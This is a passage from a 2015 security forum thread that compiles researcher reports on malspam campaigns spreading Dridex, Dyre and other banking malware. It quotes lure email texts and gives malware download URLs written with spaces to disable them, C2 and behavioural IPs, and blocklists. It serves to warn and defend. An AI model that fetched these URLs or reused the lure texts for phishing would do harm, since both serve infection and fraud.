* https://www.virustotal.com/en/file/772bf0a7dbfcca63ed11451870cadc7edd25f18754e80710b7440ba23a5cec15/analysis/1433170304/
** http://myonlinesecurity.co.uk/emailing-slide1-date-mon-01-jun-2015-143647-0200-simon-harrington-word-doc-or-excel-xls-spreadsheet-malware/
irpanet .com: 64.29.151.221: https://www.virustotal.com/en/ip-address/64.29.151.221/information/
:fear::fear: :mad:
AplusWebMaster
2015-06-02, 15:05
FYI...
DYRE Banking Malware Upsurge - Europe and North America Most Affected
- http://blog.trendmicro.com/trendlabs-security-intelligence/old-banking-malware-resurfaces-europe-north-america-most-affected/
June 2, 2015 - "Online banking users in Europe and North America are experiencing the upsurge of DYRE*, a malware family notorious for the multiple ways it steals data and its ties to parcel mule scams, among others. There has been a 125% increase of DYRE-related infections worldwide this quarter compared to the last, proving that cybercriminal interest in online banking has only continued to grow... We looked closely at the financial institutions whose URLs were contained in the DYRE malware samples. We noted URLs associated with several multinational banks, including their varied country branches, divisions, and the like... What’s troubling with this recent spam run is that it shows how online banking malware continue to come up with versions designed to defeat detection. UPATRE, the known precursor to DYRE, is part of the infection chain in this threat. Historically, UPATRE has been known to be the downloader or middleman malware of sorts for other infamous malware like ZBOT, CRILOCK, and ROVNIX. This time, UPATRE has grown beyond being just a downloader of other malware. Its new variant can -disable- detection, thus making it easier for the download of DYRE or other malware into user systems. Specifically, its additional functions include the following:
- Disabling firewall/network related security by modifying some registry entries.
- Disabling firewall/network related security via stoppage of related services.
- Disabling window’s default anti-malware feature (WinDef)
Recently, we have also seen a UPATRE variant (detected TROJ_UPATRE.HM) being dropped as a Microsoft Compiled HTML/ Help file (.CHM) on a spam run victimizing JPMorgan Chase & Co. customers. Looking at the content of the spam mail, we notice that it follows a typical social engineering ruse. It specifically tries to -scare- users into opening an attached .EXE file to find out about a non-existent law that supposedly doubles their tax. When it comes to tax, people can get worried enough to succumb to the scam. Seeing that most samples we have seen so far use the English language, it is likely that users of the DYRE malware have been sending out similar messages to a variety of regions, without specifically tweaking according to language and banking preferences... It pays to be prepared especially when consequences are literally DYRE. As we have previously advocated, banking malware that spread via -spammed- mails can be fought off by knowing your banking policies, downloading a full-featured antimalware solution, immediately changing passwords and monitoring online banking transactions in case of infections, and alerting the bank when you spot suspicious transactions..."
* http://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-dyre-malware-part-1/
___
Fake 'Rental Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/june-2015-rental-invoice-alex-batts-bbsp-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
2 Jun 2015 - "'June 2015 Rental Invoice' pretending to come from Alex Batts <abatts@ bbsp .co .uk> is being delivered mangled and malformed. It is supposed to come with a malicious word doc or Excel XLS spreadsheet attachment but that is being embedded as a base 64 encoded set of text in the mangled body of the email, rather than being attached. Most users should be protected from this malware, but be aware that some mail servers will automatically fix this sort of garbled corruption and deliver the email as a warning email with a zip of the extracted content. Do-not-click on or open the word doc inside the zip... The email which comes in -garbled- looks like:
[Garbled text...]
Hi
Please find attached the Rental Invoice for June 2015 – which is due for pa=
yment on or before 10st June.
Have a lovely afternoon.
Kind regards
Alex Batts
Forum Receptionist
Telephone : 0117 370 7700
Mobile : 0750 083 5323 ...
[More garbled text...]
2 June 2015: June 2015 Rental Invoice – Inv 103756.doc - Current Virus total detections: 1/56* | 2/57**
The second -malicious- macro downloads http ://amagumori.3dfxwave .com/7/8.exe Which is a Dridex banking malware (VirusTotal***). The first will also download the same malware but from a different location... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/e92d81e7876bed8b073b7a4639945d90b557361c24334fbd85f3cb26c42a356c/analysis/1433243825/
** https://www.virustotal.com/en/file/084bcfb1286179fbfccd09397886ff8cabfe525bb755ded49ca126e7fc69ccd2/analysis/1433250642/
*** https://www.virustotal.com/en/file/ddbe5dc2d78179d593285c11930d4fe08bddb222a10c364a35bef362443f315c/analysis/1433248974/
... Behavioural information
TCP connections
31.186.99.250: https://www.virustotal.com/en/ip-address/31.186.99.250/information/
5.178.43.49: https://www.virustotal.com/en/ip-address/5.178.43.49/information/
amagumori.3dfxwave .com: 202.129.207.121: https://www.virustotal.com/en/ip-address/202.129.207.121/information/
___
Fake 'Invoice ID' SPAM - malware attachment
- http://blog.mxlab.eu/2015/06/02/email-invoice-id-contains-trojan/
June 2, 2015 - "... intercepted a new trojan distribution campaign by email with the subject “Invoice ID”. This email is sent from a -spoofed- address and has the following short body:
INVOICE
Invoice ID: 6568469164
Store id: 9135
The attached file 6568469164_9135.zip contains the 156 kB large file invoice_company.exe. The trojan is known as PE:Malware.Obscure!1.9C59 or Trojan.Win32.Qudamah.Gen.24. At the time of writing, 2 of the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/d09c434a93f4b124a54e84a39c31237bf2b6bce09545e777c7ddb8a55e9afec0/analysis/1433259213/
... Behavioural information
TCP connections
104.238.136.31: https://www.virustotal.com/en/ip-address/104.238.136.31/information/
188.120.194.101: https://www.virustotal.com/en/ip-address/188.120.194.101/information/
173.243.255.79: https://www.virustotal.com/en/ip-address/173.243.255.79/information/
90.84.60.99: https://www.virustotal.com/en/ip-address/90.84.60.99/information/
188.120.194.101: https://www.virustotal.com/en/ip-address/188.120.194.101/information/
___
2015 Malvertising infected millions of users
- http://net-security.org/malware_news.php?id=3049
June 2, 2015 - "New research from Malwarebytes has found that -malvertising- is one of the primary infection vectors used to reach millions of consumers this year. The analysis looked at the three large scale zero-day attacks affecting Flash Player*, and the results have been presented at Infosecurity Europe 2015:
> http://www.net-security.org/images/articles/zerodays-02062015.jpg
Analysis of one particular zero-day attack instigated using the HanJuan Exploit Kit showed that cybercriminals paid an average of 49p for every 1,000 infected adverts impressions on major websites at highly trafficked times of day. This amount could even drop as low as 4p per infected ad impression on lesser-known websites and during quieter times of day. Malicious adverts placed on popular websites including The Huffington Post, Answers.com and Daily Motion, which all boast monthly unique users in the millions, are responsible for exposing vast numbers of consumers to zero-day attacks. Even consumers and businesses running the -latest- versions of Internet Explorer, Firefox and Flash Player are susceptible to becoming immediately infected when exposed to this type of threat which makes it particularly lucrative for the criminal community. Further, with one zero-day remaining active for almost two months of the analysis period there is scope for exploits to have especially wide-reaching effects. The nefarious use of the online ad industry is facilitated by real-time bidding as this allows advertisers to bid in real-time for specific targets and weed out non-genuine users or those that should not be targeted by exploits... This is especially important with the kind of malware that is dropped by exploit kits, and in particular ransomware. Companies can literally be crippled by such malware, lose customers and in some cases put their business in jeopardy."
* https://www.malwarebytes.org/threezerodays/
"... new vulnerabilities are found and weaponized at a much faster rate. Combine this trend with the fact that rolling out patches requires time and testing for businesses and you see the issue: A window of opportunity to exploit systems emerges... While keeping systems up to date remains one of the most important pieces of advice against exploits, zero-days make it completely irrelevant... To face this new reality, businesses and consumers must adapt as well by adopting new tools to safeguard their assets..."
:fear::fear: :mad:
AplusWebMaster
2015-06-03, 15:42
FYI...
Fake 'your receipt' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/your-receipt-amy-morley-howard-cundey-word-doc-or-excel-xls-spreadsheet-malware/
3 Jun 2015 - "'your receipt' pretending to come from Amy Morley <amymorley@ howardcundey .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/Amy-Morley-your-receipt.png
3 June 2015: 20150414151213550.doc - Current Virus total detections: 3/57*
The malicious macro in this version connects to and downloads anthonymaddaloni .com/~web/5/0.exe which is a Dridex banking malware (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/1ceb4c29ecb3794d1ffb4d3f41265b0dd70f58b3eff1b21adbfdee688f72784b/analysis/1433318349/
** https://www.virustotal.com/en/file/52aead62b02ddb887572371a01135230fb281cb3655c5fb18dedbcd0505b5c4b/analysis/1433318155/
... Behavioural information
TCP connections
37.140.195.177: https://www.virustotal.com/en/ip-address/37.140.195.177/information/
5.178.43.34: https://www.virustotal.com/en/ip-address/5.178.43.34/information/
anthonymaddaloni .com: 69.72.240.66: https://www.virustotal.com/en/ip-address/69.72.240.66/information/
___
Myfax malspam wave - links to malware and Neutrino exploit kit
- https://isc.sans.edu/diary.html?storyid=19759
2015-06-03 - "... there have been more waves of malicious spam (malspam) spoofing myfax .com. On Tuesday 2015-06-02, the messages contained links to a zip archive of a Pony downloader. Tuesday's messages also had links pushing Neutrino exploit kit (EK). Spoofed myfax emails are nothing new. They've been around for years. This is yet another wave in the continuous onslaught of malspam that organizations face every day... I noticed similar messages last week, but they were all blocked. At that time, I wasn't able to investigate any further. On 2015-06-02, checking my employer's spam filters revealed spoofed myfax messages were coming in again after a 3 day break... Below is an example of the messages blocked by my organization's spam filters on 2015-06-02:
> https://isc.sans.edu/diaryimages/images/2015-06-03-ISC-Diary-image-03a.jpg
The above example shows 2 types of URLs. The first points to a zip file. The second points to URLs ending in fax.php that push Neutrino EK. Last week's malspam only had links to the zip files... In a lab environment, those links ending with fax.php returned HTML with iframes leading to Neutrino EK..."
(More detail at the isc URL above.)
___
Fake email “Fax to” contains trojan
- http://blog.mxlab.eu/2015/06/03/fake-email-fax-to-contains-trojan/
June 3, 2015 - "... intercepted a new trojan distribution campaign by email with the subject “Fax to”.
This email is send from a -spoofed- address and has the following body:
Fax Massege:
Fax ID: 1500566473
User ID: 429286424
The attached file fax-1500566473_429286424.zip contains the 148 kB large file Document_invoice.exe.
The trojan is known as Downloader-FAVN!A43A201F788E, Trj/Genetic.gen, PE:Malware.Obscure!1.9C59 or Win32.Trojan.Fakedoc.Auto. At the time of writing, 4 the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/ee8aa66263e0c8249903efd4ed467b4666a0e8c7347a52826f786da91d1f247b/analysis/1433353970/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en/ip-address/104.238.141.75/information/
188.120.194.101: https://www.virustotal.com/en/ip-address/188.120.194.101/information/
92.38.41.38: https://www.virustotal.com/en/ip-address/92.38.41.38/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
:fear::fear: :mad:
AplusWebMaster
2015-06-04, 15:01
FYI...
Fake 'Scan' SPAM – PDF malware
- http://myonlinesecurity.co.uk/scan-number-3744444093-fake-pdf-malware/
4 June 2015 - "'Scan number: 3744444093' [all the numbers are random] coming from random names and random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Scan number: 3744444093
Pages: 54
4 June 2015: scan-3744444093_54.zip: Extracts to: Document_invoice.exe
Current Virus total detections: 0/58* | 1/57** This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8412fca3ff777ae74ed357d592e3fda3e9575d09d1cf25c10f57844a9ac4d65f/analysis/1433413368/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en/ip-address/104.238.141.75/information/
188.120.194.101: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
94.103.54.19: https://www.virustotal.com/en/ip-address/94.103.54.19/information/
5.178.43.35: https://www.virustotal.com/en/ip-address/5.178.43.35/information/
** https://www.virustotal.com/en/file/ad846141fd05910364c4c58f03dc365a272970325f50bb5f89c7b3eb141359b3/analysis/1433412921/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en/ip-address/104.238.141.75/information/
188.120.194.101: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
185.47.89.249: https://www.virustotal.com/en/ip-address/185.47.89.249/information/
5.178.43.49: https://www.virustotal.com/en/ip-address/5.178.43.49/information/
188.120.194.101: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
___
Fake 'Internet Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/eclipse-internet-invoice-17987580ec-word-doc-or-excel-xls-spreadsheet-malware/
4 June 2015 - "'Eclipse Internet Invoice – 17987580EC' pretending to come from customer@ eclipse .net .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Customer,
Thank you for choosing to receive your invoice by email. Please find this attached.
If you would like to change any of your billing options, please log in to My Eclipse using your registration email and password, at www .eclipse .net.uk/billing. Alternatively, you can contact our Customer Service Team, Monday to Friday 9am – 5.30pm, on the telephone number...
Kind regards
Eclipse Internet
This email has been scanned for all viruses. Please consider the environment before printing this email. The content of this email and any attachment is private and may be privileged. If you are not the intended recipient, any use, disclosure, copying or forwarding of this email and/or its attachments is unauthorised. If you have received this email in error please notify the sender by email and delete this message and any attachments immediately. Nothing in this email shall bind the Company or any of its subsidiaries or businesses in any... [blah, blah, blah]
4 June 2015 : invoice_EC_17987580_20141013081054.doc - Current Virus total detections: 2/57*
... the macro connects to http ://empreinte .com.ar/42/91.exe which is a Dridex banking malware (virusTotal***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9622fc6ee7d05888805e7c69f0c60411b0e72e8d7b2ae67e368410e1103c126e/analysis/1433415353/
** https://www.virustotal.com/en/file/22529b0b108b1c4bc9e86f2183728ad3acae8b22da2138f0d7e3cf362d82fcd0/analysis/1433415107/
empreinte .com.ar: 200.68.105.31: https://www.virustotal.com/en/ip-address/200.68.105.31/information/
___
Dyre banking Trojan infections up 125%
- http://net-security.org/malware_news.php?id=3050
June 4, 2015 - "Cybercriminal interest in online banking continues to grow, and crooks wielding the Dyre/Dyreza banking Trojan continue spewing out spam emails delivering a new variant of the malware:
> http://www.net-security.org/images/articles/dyre-04062015.jpg
'There has been a 125% increase of Dyre-related infections worldwide this quarter compared to the last', Trend Micro researchers have noted*. 'Roughly 7 in 10 users infected during the last three months came from the European (39% of the total count) and North American (38%) regions. Asia Pacific came in third, with 19% of the infections.' In early May, there was a considerable spike in these spam emails targeting the APAC region. 'We looked closely at the financial institutions whose URLs were contained in the Dyre malware samples. We noted URLs associated with several multinational banks, including their varied country branches, divisions, and the like,' the researchers shared. As before, Dyre is -not- delivered directly via email. Instead, the malicious attachments hold the Upatre downloader, which then downloads Dyre. Upatre also got updated, and these newer versions have the ability to disable firewall/network related security by modifying some registry entries and via -stoppage- of related services, and to disable Windows' default anti-malware feature (Windows Defender). The emails delivering the malware try to -scare- users into opening the attached file by claiming that the recipients' tax payments have doubled. So far, they have been mostly in English, but Trend Micro expects more regionalized messages in the future, as the attackers are looking to expand globally."
* http://blog.trendmicro.com/trendlabs-security-intelligence/old-banking-malware-resurfaces-europe-north-america-most-affected/
:fear::fear: :mad:
AplusWebMaster
2015-06-05, 14:09
FYI...
Fake 'PPL invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/your-ppl-invoice-is-attached-word-doc-or-excel-xls-spreadsheet-malware/
5 June 2015 - "'Your PPL invoice is attached' pretending to come from no-reply@ PPLUK .COM with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Customer,
Please find attached your PPL invoice for your licence to use recorded music (whether via CDs, Radio/TV broadcasts, background music systems or other sources) at your premises.
Permission to use PPL repertoire under the terms of the licence will only be effective once payment has been made. Payment of your invoice can be made online at ppluk.com/payonline or you can call us on 020 7534 1070 to pay by credit or debit card. All payment methods can be found on the back of your invoice.
This is an automated email. If you have any queries about the invoice or requirements for a PPL licence, please refer to the contact information below.
Yours faithfully,
PPL Customer Services
PPL
1 Upper James Street London W1F 9DE
T +44 (0)20 7534 1070 ...
5 June 2015 : P_PP_INVN_02573466_01-43-52_03657322_NEWBUS_O_E.DOC
Current Virus total detections: 3/57* . The malicious macro in this version downloads Dridex banking malware from http ://g6000424 .ferozo .com/25/10.exe (VirusTotal**). Other download locations downloading the same Dridex banking malware that I have been informed about are:
http ://zolghadri-co .com/25/10.exe
http ://elkettasandassociates .com/25/10.exe
http ://segurosdenotebooks .com.br/25/10.exe
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/48548e5ec35a700110d5c01b74c483aa57bb2833d2ac4d756011240833e2bbff/analysis/1433498590/
** https://www.virustotal.com/en/file/4e25fd5596c14b3e9e8f3df6077e4f2cc47132ff43890e98cec9c80c56328f1a/analysis/1433496324/
... Behavioural information
TCP connections
203.151.94.120: https://www.virustotal.com/en/ip-address/203.151.94.120/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
___
Fake 'General Election 2015 Invoices' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/general-election-2015-invoices-sims-sales-ledger-st-ives-management-services-word-doc-or-excel-xls-spreadsheet-malware/
5 June 2015 - "'General Election 2015 Invoices' pretending to come from SIMSSL@ st-ives .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Sir/Madam
Please find attached your invoice 62812 for GE2015
Please could payment be quoted with your constituency name/Invoice numbers
Our Bank Details are:
St Ives Management Services Limited
HSBC
Sort Code: 40-04-24
Account Number: 71419501
Account Name: St Ives Management Services Limited
Remittance advices should be emailed to simsAR@ st-ives .co.uk
If paying by cheque, please kindly remit to the address below and not to 1 Tudor Street:
St Ives Management Services Limited
c/o Branded3
2nd Floor, 2180 Century Way
Thorpe Park
Leeds
LS 8ZB
If you have already paid by credit card then there is no need for you to make payment again.
For payment queries please contact Steven Wilde 0113 306 6966
For invoice queries please contact Emily Villiers 0207 902 6449
Kind Regards
SIMS Sales Ledger...
5 June 2015 : 1445942147T0.doc ... which is -exactly- the same malware as described in 'Your PPL invoice is attached – word doc or excel xls spreadsheet malware'*
* http://myonlinesecurity.co.uk/your-ppl-invoice-is-attached-word-doc-or-excel-xls-spreadsheet-malware/
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
- http://blog.dynamoo.com/2015/06/malware-spam-general-election-2015.html
5 June 2015
"... Recommended blocklist:
203.151.94.120
31.186.99.250
146.185.128.226
185.12.95.40 "
:fear::fear: :mad:
AplusWebMaster
2015-06-08, 13:20
FYI...
Fake 'Bank payment' SPAM – PDF malware
- http://myonlinesecurity.co.uk/bank-payment-hairandhealth-co-uk-pdf-malware/
8 June 2015 - "'Bank payment' pretending to come from sarah@ hairandhealth .co.uk with a pdf attachment is another one from the current bot runs... This email contains a genuine PDF which has embedded scripts that will infect you. So far none of the automatic analysis tools can find any malicious content but it is trying to send multicast messages...
Update: An automatic analysis by Payload security* gives the download location as hundeschulegoerg .de/15/10.exe ( VirusTotal**)... Adobe reader in -recent- versions has Protected view automatically -enabled- and unless you press-the-button to 'enable all features', you should be safe from this attack... make sure you -uncheck- -any- additional offerings of security scans/Google chrome or -toolbars- that it wants to include in the download:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/doc4-1024x423.png
The email (which has random amounts) looks like:
Dear client
Please find attached a bank payment for £3033.10 dated 10th June 2015
to pay invoice 1757. With thanks.
Kind regards
Sarah
Accounts
Todays Date: Bank payment 100615.pdf - Current Virus total detections: 2/57***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.hybrid-analysis.com/sample/80410f74dca5ffae069fa4a07c368e749f351ffe385432ab816b64024697a06e?environmentId=2
** https://www.virustotal.com/en-gb/file/01d5203ee1b17ca0ea488853647bce5b9440bce941a5e840fcda804631c01f40/analysis/1433753588/
... Behavioural information
TCP connections
146.185.128.226: https://www.virustotal.com/en-gb/ip-address/146.185.128.226/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
*** https://www.virustotal.com/en-gb/file/80410f74dca5ffae069fa4a07c368e749f351ffe385432ab816b64024697a06e/analysis/1433751824/
hundeschulegoerg .de: 212.40.179.111: https://www.virustotal.com/en-gb/ip-address/212.40.179.111/information/
- http://blog.dynamoo.com/2015/06/malware-spam-bank-payment.html
8 June 2015
"... Recommended blocklist:
146.185.128.226
31.186.99.250
176.99.6.10
203.151.94.120
185.12.95.40 "
:fear::fear: :mad:
AplusWebMaster
2015-06-09, 13:22
FYI...
Fake 'Invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/re-invoice-fake-pdf-malware/
9 June 2015 - "'Re: Invoice' coming from random senders and random email addresses with a semi random zip attachment the zip is always called 'invoice(random number).zip' is another one from the current bot runs... other emails today pretending to come from RBC Express <ISVAdmin@ rbc .com> with a subject of 'invoices', along with a 'Lloyds Bank – Pendeford Securities – Please Read Action Required/PI Documents/ Region code East 2/ 4084583/'. These 2 have a different malware payload (VirusTotal*)... The email looks like:
Check Invoice number
9 June 2015: Invoice (42).zip: Extracts to: Invoice_store.exe - Current Virus total detections: 2/57**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/60a37e23969a4e90a8e2b64b8c15569173dead0479048e25fa3eb996a4e1b201/analysis/1433843143/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en-gb/ip-address/64.182.208.183/information/
188.120.194.101: https://www.virustotal.com/en-gb/ip-address/188.120.194.101/information/
216.254.231.11: https://www.virustotal.com/en-gb/ip-address/216.254.231.11/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
188.120.194.101: https://www.virustotal.com/en-gb/ip-address/188.120.194.101/information/
** https://www.virustotal.com/en-gb/file/6d645abb12fe3631a2134f29183f1010c80163201b5f475c212cdbeb4ecce49c/analysis/1433843556/
___
Fake 'Password Confirmation' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/password-confirmation-742263403307-t82-word-doc-or-excel-xls-spreadsheet-malware/
9 June 2015 - "'Password Confirmation [742263403307] T82' pretending to come from steve.tasker81@ thomashiggins .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email (which has random numbers in the subject) looks like:
Full document is attached
09 June 2015: 1913.doc - Current Virus total detections: 2/57*
... which connects to and downloads a Dridex banking malware from speakhighly .com/42/11.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/9dc725615952bb0601fc957a3b05428d9407bdaaebefaaea78e9f46c6592e9e3/analysis/1433841783/
** https://www.virustotal.com/en-gb/file/fdfac3eac11bdca01c3d562a529b9d6b9d63b573ca9b907bbf8bb7fd8f9fdce1/analysis/1433842088/
... Behavioural information
TCP connections
173.230.130.172: https://www.virustotal.com/en-gb/ip-address/173.230.130.172/information/
5.178.43.48: https://www.virustotal.com/en-gb/ip-address/5.178.43.48/information/
speakhighly .com: 77.73.6.74: https://www.virustotal.com/en-gb/ip-address/77.73.6.74/information/
- http://blog.dynamoo.com/2015/06/malware-spam-password-confirmation.html
9 June 2015
"... Recommended blocklist:
173.230.130.172
94.23.53.23
31.186.99.250 "
___
Fake 'Unpaid invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/unpaid-invoice-debbie-spencer-burgoynes-lyonshall-ltd-word-doc-or-excel-xls-spreadsheet-malware/
9 June 2015 - "'Unpaid invoice' pretending to come from Debbie Spencer <Debbie@ burgoynes-lyonshall .co .uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Hi
Could you let me know when the attached will be paid?
Many thanks
Debbie
Deborah Spencer
Company Accountant
Burgoynes (Lyonshall) Ltd
Lyonshall
Kington
Herefordshire HR5 3JR
01544 340283 ...
The malware in this email is exactly the -same- as described in today’s earlier malspam run with word docs 'Password Confirmation [742263403307] T82 – word doc or excel xls spreadsheet malware'*... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/password-confirmation-742263403307-t82-word-doc-or-excel-xls-spreadsheet-malware/
___
The HTTPS-Only Standard
- https://https.cio.gov/
___
Beware of Emails Bearing Gifts
- http://www.darkreading.com/partner-perspectives/intel/beware-of-emails-bearing-gifts-/a/d-id/1320769
6/9/2015 - "Crime gangs are building very legitimate-looking emails as cover for phishing and ransomware, and they are having enough success that the attacks are escalating. In the first quarter of 2015, McAfee Labs registered a 165% increase in new ransomware driven largely by the new, hard-to-detect CTB-Locker ransomware family, new ransomware families such as Teslacrypt and TOX, and the emergence of new versions of CryptoWall, TorrentLocker, and BandarChor. Dell Secureworks* believes the ransomware business truly pays, with CryptoWall reaching at least 1 million victims and collecting about $1.8 million in ransom. The growth of ransomware is likely to continue to surge given the rise of new “business models,” the growing availability and ease of operation of newer ransomware kits, and the general increase in tactical sophistication. For instance, CTB-Locker possesses clever techniques for evading security software, higher-quality phishing emails, and an “affiliate” program that offers accomplices a percentage of ransom payments in return for flooding cyberspace with CTB-Locker phishing messages. In the case of TOX, ransomware is going the way of other malware, delivered in turnkey ransomware packages, simplifying the development, launch, and ongoing operation of ransomware campaigns. And where fewer technical skills are required, you have an increase of less-skilled perpetrators getting into a cybercrime business... Phishing and ransomware attacks are hardly new, but the rapid changes in malware code and the legitimate-looking emails are making it harder for both users and antivirus programs to detect the surprise waiting at the other end of the link. No single security solution provides an adequate defense. When malware can sneak through a network firewall, lie low to trick a sandbox, and evade endpoint antivirus, a thorough defense requires the combined resources of a security-connected framework."
* http://www.secureworks.com/cyber-threat-intelligence/threats/teslacrypt-ransomware-threat-analysis/
___
Flash malware jumps over 300 percent - Q1-2015
- http://www.theinquirer.net/inquirer/news/2412279/adobe-flash-malware-jumps-over-300-percent-in-first-quarter-of-2015
Jun 09 2015 - "MALWARE ATTACKS on the Adobe Flash platform rose by a horrifying 317 percent in the first quarter of 2015. New figures in the McAfee Labs Threats Report May 2015 (PDF*) show that the number of recorded Flash malware instances was almost 200,000 in Q1 2015, compared with 47,000 in Q4 2014...
* http://www.mcafee.com/us/resources/reports/rp-quarterly-threat-q1-2015.pdf
Spam continues ever onward with six trillion messages sent in Q1. A total of 1,118 spam domains were discovered in the UK alone, beating Russia (1,104) and Japan (1,035). Phishing domains hit 887 in the UK, compared with France (799) and the Netherlands (680). Overall, McAfee Labs observed 362 phishing attacks a minute, or six every second..."
:fear::fear: :mad:
AplusWebMaster
2015-06-10, 14:26
FYI...
Fake 'BTT telephone bill' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/your-monthly-btt-telephone-bill-hayley-sweeney-word-doc-or-excel-xls-spreadsheet-malware/
10 Jun 2015 - "'Your monthly BTT telephone bill' pretending to come from Hayley Sweeney <admins@ bttcomms .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find attached your telephone bill for last month. This message was sent automatically.
For any queries relating to this bill, please contact Customer Services on 01536 211100.
10 June 2015 : Invoice_68362.doc - Current Virus total detections: 5/57*
... Which downloads a Dridex banking malware from www .jimaimracing .co.uk/64/11.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/bba2cce71f9c253a34dae8887effeff97874ee3a941f2fa42015aea04f581168/analysis/1433931273/
** https://www.virustotal.com/en/file/3a978d2ac64e1d7906d3df3febe0d54700c3298e6936bfb02e010d19d008e3dc/analysis/1433932505/
jimaimracing .co.uk: 91.194.151.37: https://www.virustotal.com/en/ip-address/91.194.151.37/information/
- http://blog.dynamoo.com/2015/06/malware-spam-hayley-sweeney.html
10 June 2015
"... Recommended blocklist:
173.230.130.172
94.23.53.23
176.99.6.10 "
:fear::fear::mad:
AplusWebMaster
2015-06-11, 13:29
FYI...
Fake 'order reference' SPAM - PDF malware
- http://myonlinesecurity.co.uk/your-order-reference-is-05806-fake-pdf-malware/
11 Jun 2015 - "'Your order reference is 05806' pretending to come from inform <john.wade@ precisionclubs .com> with a zip attachment is another one from the current bot runs... The email looks like:
Dear client,
Thank you for the order,
your credit card will be charged for 312 dollars.
For more information, please visit our web site ...
Best regards, ticket service.
Tel./Fax.: (828) 012 88 840
11 June 2015: payment_n09837462_pdf.zip:
Extracts to: payment_n09837462_pdf_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _.exe
Current Virus total detections: 5/57*. Note the series of _ after the pdf. That is designed to try to fool you into thinking that the .exe file is a pdf so you open it. Most windows computers won’t show the .exe in windows explorer if enough spaces or _ are inserted. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/a061c5d3e0a14ac1394afbca5b7df97f44a30a8ba6a4e4ae7f9c3518d33b9675/analysis/1434002812/
___
Fake 'New_Order' email / Phish...
- http://blog.dynamoo.com/2015/06/phish-neworder056253hfconstructions.html
11 Jun 2015 - "I've seen a few of these today, presumably they aren't quite spammy enough to get blocked by our mail filters.. The attachment is New_Order_#056253_Hf_Constructions.pdf which looks like a purchase order, but there is a blurred out section:
Screenshot: https://4.bp.blogspot.com/-4adKeKIur7k/VXlOx3_HqAI/AAAAAAAAGrE/hCE8BPkBVUY/s640/hf-1.jpg
An examination of the underlying PDF file shows two URLs... In turn these redirect... The second URL listed 404s, but the first one is active. According to the URLquery report*, it looks harmless, just leading to a phishing page. But when I tried it in a test environment, the behaviour was somewhat different and it also attempted to load a page... This page 404s, but was previously hosted on a bad server at 92.222.42.183 [VT report**]. That server has been offline for a few days, but the URL is suggestive of an exploit kit of some sort. The "megatrading .hol.es" (hosted on 31.220.16.16 by Hostinger - VT report***) landing page looks like a straightforward phish:
Screenshot: https://4.bp.blogspot.com/-lsN0K-Cu2lU/VXlQkDH1haI/AAAAAAAAGrQ/TZdb5jkiODk/s640/hf-2.png
Entering the username and password always seems to return an error, even if you are absolutely certain the combination are correct:
